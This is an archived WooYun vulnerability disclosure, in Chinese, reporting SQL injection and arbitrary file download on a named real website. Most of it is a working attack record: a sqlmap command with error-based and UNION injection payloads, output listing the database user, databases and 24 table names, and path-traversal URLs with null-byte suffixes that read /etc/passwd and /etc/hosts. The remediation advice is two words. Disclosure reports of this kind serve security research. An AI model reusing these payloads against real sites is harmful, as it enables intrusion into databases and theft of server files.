乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-06: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-06-20: 厂商已经主动忽略漏洞,细节向公众公开
中车联盟网站存在sql注入+任意文件下载漏洞
问题1,sql注入注入参数searchword
[root@Hacker~]# Sqlmap -u "http://www.aachina.net/search.php?search=search&searchword=4Cub3IhuFH6"---Place: GETParameter: searchword Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: search=search&searchword=4Cub3IhuFH6' AND (SELECT 7835 FROM(SELECTCOUNT(*),CONCAT(0x3a6d666a3a,(SELECT (CASE WHEN (7835=7835) THEN 1 ELSE 0 END)),0x3a6b6d6f3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BYx)a) AND 'ugoP'='ugoP Type: UNION query Title: MySQL UNION query (NULL) - 12 columns Payload: search=search&searchword=4Cub3IhuFH6' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a6d666a3a,0x4f62526d7a6e696a6146,0x3a6b6d6f3a), NULL, NULL, NULL,NULL, NULL, NULL, NULL, NULL, NULL, NULL#---[17:43:49] [INFO] testing MySQL[17:43:49] [WARNING] reflective value(s) found and filtering out[17:43:49] [INFO] confirming MySQL[17:43:50] [INFO] the back-end DBMS is MySQL[17:43:50] [INFO] fetching banner[17:43:51] [INFO] actively fingerprinting MySQL[17:43:51] [INFO] heuristics detected web page charset 'utf-8'[17:43:52] [INFO] executing MySQL comment injection fingerprintweb server operating system: Linux CentOSweb application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0banner: '5.1.69'[17:44:27] [INFO] fetching database usersdatabase management system users [1]:[*] 'aachina'@'localhost'[17:44:28] [INFO] fetching database namesavailable databases [3]:[*] db_aachina[*] information_schema[*] test[17:55:12] [INFO] the back-end DBMS is MySQLweb server operating system: Linux CentOSweb application technology: PHP 5.3.3, Apache 2.2.15back-end DBMS: MySQL 5[17:55:12] [INFO] fetching database names[17:55:12] [INFO] fetching tables for databases: 'db_aachin, test'[17:55:13] [WARNING] reflective value(s) found and filterinDatabase: db_aachina[24 tables]+---------------------------------------+| gwi_admin || gwi_adminlog || gwi_channel || gwi_comment || gwi_failedlogin || gwi_file || gwi_file_class || gwi_form || gwi_formdata || gwi_gbook || gwi_group || gwi_info || gwi_info_class || gwi_info_content || gwi_keyword || gwi_link || gwi_member || gwi_photo || gwi_photo_class || gwi_rel_comkey || gwi_rel_key || gwi_settings || gwi_styles || gwi_templates |+---------------------------------------+
问题2,任意文件下载http://www.aachina.net/user.php?action=../../../../../../../../../../etc/passwd%00.jpghttp://www.aachina.net/user.php?action=../../../../../../../../../../etc/hosts%00.jpg
已经证明
过滤参数
未能联系到厂商或者厂商积极拒绝